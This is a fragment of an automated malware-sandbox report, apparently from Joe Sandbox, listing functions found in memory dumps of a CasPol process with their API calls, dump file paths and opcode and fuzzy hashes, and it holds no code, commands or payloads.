Instruction Fuzzy Hash: 8811F2B1D046488FCB10CF9AD444B9EFBF4EB49314F10841AE459A7610D3B8A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1C7EF698 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,1C7EED07), ref: 1C7EF6FD

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: c2e180ce8b21d701902aab8aec303b1664057caea5b7d6b4e11ab71da3941f34
Instruction ID: 9a1235682df679eafce8c84e912d1bb22208ed0b0315957fffb6388a5df0c252
Opcode Fuzzy Hash: c2e180ce8b21d701902aab8aec303b1664057caea5b7d6b4e11ab71da3941f34
Instruction Fuzzy Hash: 4F1110B1C046489FCB10CFAAE444BDEFBF4EF89314F10842AD459A7610C378A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0104752A Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 01047585

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e6ac05e3a25f663f0ffab249fc672ac2b75858d86a0ef6c3c28523ae74c37c41
Instruction ID: 4e1b940ec0f8e594cd7f08a16496e41bd89fc9e53743bc2e3da2f7b6aa4bcdf2
Opcode Fuzzy Hash: e6ac05e3a25f663f0ffab249fc672ac2b75858d86a0ef6c3c28523ae74c37c41
Instruction Fuzzy Hash: 761127B1D042488FDB10CFAAD584BDEFBF4EF48324F14845AD558A7600C374A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E9A80 Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1C7E99B9,00000800), ref: 1C7E9A4A

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6043f693774d9b9bcd4f30f0de4a3010ba6c39f7f3d47b9c2afe2d5e817a0d8c
Instruction ID: 65f9e8bb382a4fec7fc0b7a3ad30ffb818b9969ff44df308b862f6238b11fff3
Opcode Fuzzy Hash: 6043f693774d9b9bcd4f30f0de4a3010ba6c39f7f3d47b9c2afe2d5e817a0d8c
Instruction Fuzzy Hash: B601D1779083958EDB01ABAAD8003CABBF4BF02328F24809BD109D7652C3B95185CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0146C0FC Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

], xrefs: 0146C2C5

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: ]
API String ID: 0-3352871620
Opcode ID: 80fccd6bce44f15c40fb500835814f8f7659949a198557da421e5fadfa9fadad
Instruction ID: 3f69fd6a6540421666031e5dde74c7485d69e02a9c4c4eb62f7fff33d236fb18
Opcode Fuzzy Hash: 80fccd6bce44f15c40fb500835814f8f7659949a198557da421e5fadfa9fadad
Instruction Fuzzy Hash: 3F91AB71E04249DFCF05CFA8C880AEEBFB6BF89318F148126E945AB361D7319955CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01464DA8 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(oWl, xrefs: 01464F21

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: (oWl
API String ID: 0-3065459248
Opcode ID: bc8bc6b14b645254561ee6bb7eec0284e6ee3e781bbf44799770cedaf2802951
Instruction ID: a9e899de7381902118ca1a26b3eb4c0199a96ef7b9fb5dc12b0c81f92bc5260e
Opcode Fuzzy Hash: bc8bc6b14b645254561ee6bb7eec0284e6ee3e781bbf44799770cedaf2802951
Instruction Fuzzy Hash: F24108357042549FCB18DB68C8949AE7BF6EFC9224F15406AEA06DB3A1CF35DC02C792

Uniqueness

Uniqueness Score: -1.00%

Function 014638C8 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

4'Wl, xrefs: 01463953

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: 4'Wl
API String ID: 0-3539011183
Opcode ID: 86278b9c677d1e1dac57d71776ed911418a08a9672847ae85f507d5bbc167f6b
Instruction ID: 2cbbd3adb832ff234232a0583fa84f3d7bbf9fb5b95af7111f6cab1de71aecfb
Opcode Fuzzy Hash: 86278b9c677d1e1dac57d71776ed911418a08a9672847ae85f507d5bbc167f6b
Instruction Fuzzy Hash: 06414A756002558FDB15CF28C888AAE7BB9FF89318F00006AE91ACB3B1C731DD55CB92

Uniqueness

Uniqueness Score: -1.00%

Function 014658F8 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

H[l, xrefs: 014659CF

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: H[l
API String ID: 0-1838277583
Opcode ID: 61354babcbb504b97beaa1b9776159af8ec7b94ce800a6537e355f91d716f94d
Instruction ID: 9d4d7829bfdf00fe4f8fe6c4d03cb598853f82b40548c7405972139f93e1eef0
Opcode Fuzzy Hash: 61354babcbb504b97beaa1b9776159af8ec7b94ce800a6537e355f91d716f94d
Instruction Fuzzy Hash: 4B41E3313083158FCB059F28D85466E7BB6EF8A264B05806AF949CB371CB39DC16CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01463C10 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'Wl, xrefs: 01463C8A

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: 4'Wl
API String ID: 0-3539011183
Opcode ID: 70ee2840b2ca086711ab7414ad19749eb44e32ef6e4cc67085b22db2e366bc4d
Instruction ID: 823eeca0e8a1b45327e955344b8a8f7c965c8e3ad87cd1b83fdb84348ae5a79b
Opcode Fuzzy Hash: 70ee2840b2ca086711ab7414ad19749eb44e32ef6e4cc67085b22db2e366bc4d
Instruction Fuzzy Hash: A32196727081A58FE714CE2B8884A6BBBEEBB45254B054427F90EC7369DB31D912C762

Uniqueness

Uniqueness Score: -1.00%

Function 0146B39B Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

PHWl, xrefs: 0146B3D7

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: PHWl
API String ID: 0-624880166
Opcode ID: 125986463f8053d6ec04c1d30a0b8e87eda98092761292a9f96f09973dacd373
Instruction ID: de2c7572c4f1484f8a99f2c89215fadae3328f4b054f66215bba83c559b1cf75
Opcode Fuzzy Hash: 125986463f8053d6ec04c1d30a0b8e87eda98092761292a9f96f09973dacd373
Instruction Fuzzy Hash: 67E09230B04129CBEB10DFE1D9AC26E7B74EF40248F20442AD912E6260DF349942CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0146AAFF Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d62c6aca928c4a144e8f83588e411909ba21e4ccf622c383a44f9146d04266c
Instruction ID: 5e3906142df3ad66557c52d4c42b83f622c7c41bc5eb0b33074dcc9ee874b3ed
Opcode Fuzzy Hash: 9d62c6aca928c4a144e8f83588e411909ba21e4ccf622c383a44f9146d04266c
Instruction Fuzzy Hash: 7BD1A030A006048FCB14DF78D9946AE7BF6EF98318F20846AE505EB365DB35DC46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01465070 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125888b81c40a6d354cf16fe9a1fd8c65973a0f56370eced4076ae6f9fbb5b48
Instruction ID: 955fca2afbfd025d70f514c7a53f122bc163521053d37bfffccf0fe03c7d06ed
Opcode Fuzzy Hash: 125888b81c40a6d354cf16fe9a1fd8c65973a0f56370eced4076ae6f9fbb5b48
Instruction Fuzzy Hash: EDD10C75A006148FCB15CF6CC584AADBBFABF88754F1A806AE505AB371CB71EC81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01464F50 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a7c924736ac82c0e2f056bfa32cacc9b22c8eb215dd814e8a3c3f6570eb6b0
Instruction ID: 8f1ac3d9d0e02daf7729561d374c1cb8f2fb03d5485a3dccf37fafc74592a40a
Opcode Fuzzy Hash: e1a7c924736ac82c0e2f056bfa32cacc9b22c8eb215dd814e8a3c3f6570eb6b0
Instruction Fuzzy Hash: 72D11C75E002188FCB05CFA8C98499DBBFABF89354F1A845AE515AB371C735EC81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0146BE00 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3bba81e376098108ebfa891470ba8703534c222c9527d741e2fe6c826716eab
Instruction ID: ca965df4037c5e35b763a83024d8318b306179af0a6a0ac6a5aef727fbb67dc6
Opcode Fuzzy Hash: b3bba81e376098108ebfa891470ba8703534c222c9527d741e2fe6c826716eab
Instruction Fuzzy Hash: B3713A307006058FDB19DF6DC894A6E7BE9EF59218B1900AAEA46CB371DB71DC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0146CA78 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca78dff9349a2a503af760d28900b16846a64fc7dd97c4064c752ffd8e3df0cf
Instruction ID: 6118604ac2780172ec9bb4c11e320488574ced7bddb54619348177f70decf773
Opcode Fuzzy Hash: ca78dff9349a2a503af760d28900b16846a64fc7dd97c4064c752ffd8e3df0cf
Instruction Fuzzy Hash: D8619171E003498FDF12CFA9C1806DEBBF6AF89318F24861AE845AB355D770A981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01461830 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ceca12e768499984571b148d6c594df0dcd4eade8a81dc29af68c27bc578e72
Instruction ID: 8d28238592550b3a0312e5b7f7c2ce11df2bf7437e032011cacf62843c48500f
Opcode Fuzzy Hash: 4ceca12e768499984571b148d6c594df0dcd4eade8a81dc29af68c27bc578e72
Instruction Fuzzy Hash: 1541F5743082108FDB169B38C49473E7BE6AFC9619F04842AD646CB3A6DF39CC46C792

Uniqueness

Uniqueness Score: -1.00%

Function 0146CA68 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4f738d7002e330b70620d32f7d0cbb6965c3c5f9da1911297b117b46f2a1e3
Instruction ID: b7e0751b6f8f08e1cf07339992d74a371cdd0785cf156a95377dcc5d4c12a454
Opcode Fuzzy Hash: 4d4f738d7002e330b70620d32f7d0cbb6965c3c5f9da1911297b117b46f2a1e3
Instruction Fuzzy Hash: E951A071E007498FDF12CFA9C1806DEBBF6AF89314F24461AE845AB355D370A981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0146C25B Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c85e9110f3f6de55f499d44bddca4a287572d598752bffad650ddff0f1f0cb
Instruction ID: 90ba0f52074d60c3fc4b99c2c1e1e4036fcd3fdc9f3544876680de42bb79ef11
Opcode Fuzzy Hash: 21c85e9110f3f6de55f499d44bddca4a287572d598752bffad650ddff0f1f0cb
Instruction Fuzzy Hash: 0741A231A04249DFCF02CFA8C8C46AE7FB5BF45358F048167E995AB261D331D951CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01462618 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8161bfddfd510a759f2b925664aae7c3b76076e32e87b5bd6ab469b16e6f4f4f
Instruction ID: 317b74c3247b7d28a85a61804e001c93083fe94728df5a223c3eeb8194e48ffa
Opcode Fuzzy Hash: 8161bfddfd510a759f2b925664aae7c3b76076e32e87b5bd6ab469b16e6f4f4f
Instruction Fuzzy Hash: 6E41F430604214AFCB118F64C844FAF7BF6EF45318F05806AE9099B261D7B9DC56CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 014614A8 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611a677ffbe087ad9907ad40240eb2b690f17ff196bcf0eac7d7cc6b552d2f6f
Instruction ID: a6836fcb58b3e9d0864849a3846d82bad093410326ee0cf5f944c26e760264dc
Opcode Fuzzy Hash: 611a677ffbe087ad9907ad40240eb2b690f17ff196bcf0eac7d7cc6b552d2f6f
Instruction Fuzzy Hash: F741A5317042599FCF429F58D894AAFBBA6EF88714F04402AF91AC7361CB35CD22DB91

Uniqueness

Uniqueness Score: -1.00%

Function 014657F0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188ccae48e098c61a33b2f1db3e35af9ad58cb9fe987f8ce3602dbd1e298b788
Instruction ID: fcc84acd7e3f9e6425ff616dc8d3806e58c5795d70e8003d17444cda8634141c
Opcode Fuzzy Hash: 188ccae48e098c61a33b2f1db3e35af9ad58cb9fe987f8ce3602dbd1e298b788
Instruction Fuzzy Hash: F831C331A043559FCB01CFADE880AAFBBB8EF89254F04406BE514DB362C7759811CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0146C340 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 805e8d63e119df02a9b8376e535883144553fe005e2aef520aa67fcc80d1b731
Instruction ID: 899be89986e17a519368efdc95138be33ae19223fbcb4bae00ec8b1c42b9e643
Opcode Fuzzy Hash: 805e8d63e119df02a9b8376e535883144553fe005e2aef520aa67fcc80d1b731
Instruction Fuzzy Hash: 3331A2316042458FCB12CF68C884AAE7FB5AF46368F0545A7D5959F2B2D330E940CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01463D08 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa5e4dfe40f5225c341172aa715a39dbc853a670df0a60ad371980f495623f5
Instruction ID: 778409fe75f7cfa5ea64db185d536f48c5221431d84e9312baa7a4b8ea855e35
Opcode Fuzzy Hash: 7aa5e4dfe40f5225c341172aa715a39dbc853a670df0a60ad371980f495623f5
Instruction Fuzzy Hash: 8B21903031429047EB266A2D889567F61DFAFE561CF14403AE90ACB7A5DE3ADC439393

Uniqueness

Uniqueness Score: -1.00%

Function 1D68D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89335436217.000000001D68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D68D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d68d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df50174d8d75638e07e7cbb97383dcca0a00f349a58439aebed4123ee6b746e4
Instruction ID: ae2293e23af732982f06218063841ddad764803c4f801acbd39bd4ed2e4c52c1
Opcode Fuzzy Hash: df50174d8d75638e07e7cbb97383dcca0a00f349a58439aebed4123ee6b746e4
Instruction Fuzzy Hash: 1121B0B1504380EFDB01DF18D980B2ABB65FB98618F24C56AE9094B247C376E456CBB3

Uniqueness

Uniqueness Score: -1.00%

Function 1D68D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89335436217.000000001D68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D68D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d68d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09984f88e5a7b6014043e3ec1e982717b0449b163cc425596bdf55c06be6e730
Instruction ID: f77563b7b905ee88254701f75ef74ab37792f0cb4e118d0d40f255c68b6a7e70
Opcode Fuzzy Hash: 09984f88e5a7b6014043e3ec1e982717b0449b163cc425596bdf55c06be6e730
Instruction Fuzzy Hash: 0D21D375504344EFDB01DF18D9C0B1ABB65FBA8728F24C569E9094B24BC336E856CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 014619F0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc90c35dd790cbe5046d5340071e27fa1f65c8690b9e5e0a3b806e35ee24cef6
Instruction ID: ddf988f086258c043ac730bb8efe6213a2734d2328458aa92a1570d7be3436a7
Opcode Fuzzy Hash: bc90c35dd790cbe5046d5340071e27fa1f65c8690b9e5e0a3b806e35ee24cef6
Instruction Fuzzy Hash: 98210835300A218BD7159A29C49492FB7EAFFC9A59714453AE906CB761CF35EC0287C1

Uniqueness

Uniqueness Score: -1.00%

Function 1D69D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89335591752.000000001D69D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D69D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d69d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6096c1ea9e1985c4506af9580a207e9e2f4a5e43f104115d5f9d240eacb6e7c
Instruction ID: 635eca7e952526f0c1565c7afa24582211c1ad4f847d29f2933e1feb2677c696
Opcode Fuzzy Hash: c6096c1ea9e1985c4506af9580a207e9e2f4a5e43f104115d5f9d240eacb6e7c
Instruction Fuzzy Hash: 19210474608280DFDB09CF28D9C4B16BB61FB98718F24C579D9494B286C33AD847CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 014619E0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d32262c94b82b88c376ee8e847402913d4b464e4106e42f797c022d6f20ebc7
Instruction ID: df30d6059d391649a7d22e25d06e198ca489a2691795da427aa9a65f075d2413
Opcode Fuzzy Hash: 5d32262c94b82b88c376ee8e847402913d4b464e4106e42f797c022d6f20ebc7
Instruction Fuzzy Hash: 58110435305A118FC7158A2DC49496EBBEAFFC5A65709406AE906CB361DF35DC028BD1

Uniqueness

Uniqueness Score: -1.00%

Function 01462609 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 417774cdf63bdfcde04ebecf81ab91f18ed090d3898810e3fd4d82945595bf88
Instruction ID: 55b9a82ff969441cbf9f53bf0d865db4399bfb2611024c9737f9dd3d0196eef6
Opcode Fuzzy Hash: 417774cdf63bdfcde04ebecf81ab91f18ed090d3898810e3fd4d82945595bf88
Instruction Fuzzy Hash: 80219031904208EFDB14CF54C844FABBBF9EB44324F00846BE54A9B261D375DD54CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D69D006 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89335591752.000000001D69D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D69D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d69d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428f83bcef677a0cd10a202e312e3bb011c5297111bcff0439aa884b5712c6e3
Instruction ID: e65843775661e7192e7e247c70d12c4673c2fffabbc95cfcc782769515bf69cf
Opcode Fuzzy Hash: 428f83bcef677a0cd10a202e312e3bb011c5297111bcff0439aa884b5712c6e3
Instruction Fuzzy Hash: 57219075508380DFDB06CF14D994B15BFA1FB4A314F24C5AAD8494F296C33AD856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D68D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89335436217.000000001D68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D68D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d68d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db73e0eddcb5855e546e9a5d397439a08c29d918ac1a6b330bb9ae15e84eb01f
Instruction ID: 9f435dfdfe6816033ec98700666409843590aba767bbf88e639ccf6834dd3112
Opcode Fuzzy Hash: db73e0eddcb5855e546e9a5d397439a08c29d918ac1a6b330bb9ae15e84eb01f
Instruction Fuzzy Hash: BB116D76504280DFDB01CF14D5C4B16BF61FB98324F2486A9D9494B656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D68D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89335436217.000000001D68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D68D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d68d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db73e0eddcb5855e546e9a5d397439a08c29d918ac1a6b330bb9ae15e84eb01f
Instruction ID: 365b20a86a69f0e20fdff23bd1d86555c102aadcca2de9666cdec49dbf388942
Opcode Fuzzy Hash: db73e0eddcb5855e546e9a5d397439a08c29d918ac1a6b330bb9ae15e84eb01f
Instruction Fuzzy Hash: EA11AF76504280DFCB01CF14D5C4B1ABF71FB98314F24C5AAD8490B656C376D456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01463C0F Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed40ee2c075c308c7aec622bb1d2292300f5f6d046003d96efa36e46a8ef1cff
Instruction ID: af2ab164b6a6af058b3ed87e48c7bae8d9e4f7c389b47237ef55aded6cde5202
Opcode Fuzzy Hash: ed40ee2c075c308c7aec622bb1d2292300f5f6d046003d96efa36e46a8ef1cff
Instruction Fuzzy Hash: 010192737041A54B9B14CE6B88849AFBBEEBA851247048427F51EC2228DB31D90296A2

Uniqueness

Uniqueness Score: -1.00%

Function 014614F0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eab5ea2018c221fe05297e7e80d3fa21c90c501b4501ac7ce94c8d1b7faa278
Instruction ID: d6f699ce6728b6f6f3f84054c26b05699df43168d045903f8d1ec0209d05142e
Opcode Fuzzy Hash: 0eab5ea2018c221fe05297e7e80d3fa21c90c501b4501ac7ce94c8d1b7faa278
Instruction Fuzzy Hash: 971182316002299FCB119F1CD484AABBBA9FF88715F08402AF90AC7321DB35D961CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01461627 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6608eddfd6ca23abee9c6aaf49908b193675010c7be4f775fb1e017cb502b50
Instruction ID: 6ae1ee691a0854760599f9c15e151ba68c681b707b8748662a4ab796d29ae645
Opcode Fuzzy Hash: d6608eddfd6ca23abee9c6aaf49908b193675010c7be4f775fb1e017cb502b50
Instruction Fuzzy Hash: 790128327042556FCB428E6C9C106EF3BABDFC86A0B09805AF508C7261CE798C1297A1

Uniqueness

Uniqueness Score: -1.00%

Function 0146AA88 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
